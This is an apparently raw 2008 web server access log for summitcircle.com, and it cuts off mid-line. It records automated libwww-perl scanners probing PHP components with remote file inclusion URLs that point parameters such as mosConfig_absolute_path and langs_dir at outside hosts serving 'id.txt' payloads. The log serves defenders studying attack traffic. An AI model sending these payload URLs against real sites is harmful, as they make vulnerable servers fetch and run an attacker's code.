67.15.205.17 - - [29/Jun/2008:06:35:55 -0700] "GET /logs/index.php?redir=http://loverzpoint.org/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.75.35.118 - - [29/Jun/2008:06:36:03 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.delcorso.org/images/blank? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:36:08 -0700] "GET /logs/access_071224.log//language.inc.php?langs_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:36:08 -0700] "GET //language.inc.php?langs_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
209.250.234.226 - - [29/Jun/2008:06:36:08 -0700] "GET /logs//language.inc.php?langs_dir=http://210.60.110.116/news/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:36:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:36:09 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:36:09 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
85.196.86.114 - - [29/Jun/2008:06:36:10 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:06:36:16 -0700] "GET /logs/access_080114.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:06:36:17 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
64.106.202.240 - - [29/Jun/2008:06:36:17 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://210.60.110.116/board/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:36:21 -0700] "GET /logs/access_071224.log//language.inc.php?langs_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:36:21 -0700] "GET //language.inc.php?langs_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
216.12.200.84 - - [29/Jun/2008:06:36:21 -0700] "GET /logs//language.inc.php?langs_dir=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.summitcircle.com"
205.234.215.105 - - [29/Jun/2008:06:36:21 -0700] "GET /logs/access_071001.log//?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.215.105 - - [29/Jun/2008:06:36:22 -0700] "GET //?mosConfig_absolute_path=http://www.bucknellstudentgovernment.com/fuckrox-id.txt??? HTTP/1.1" 200 779 "-" "libwww-perl/5.811" "www.summitcircle.com"
205.234.215.105 - - [29/Jun/2008:06:36:22 -0700] "GET /logs//?mosConfig_absolute_path=http://www.buckn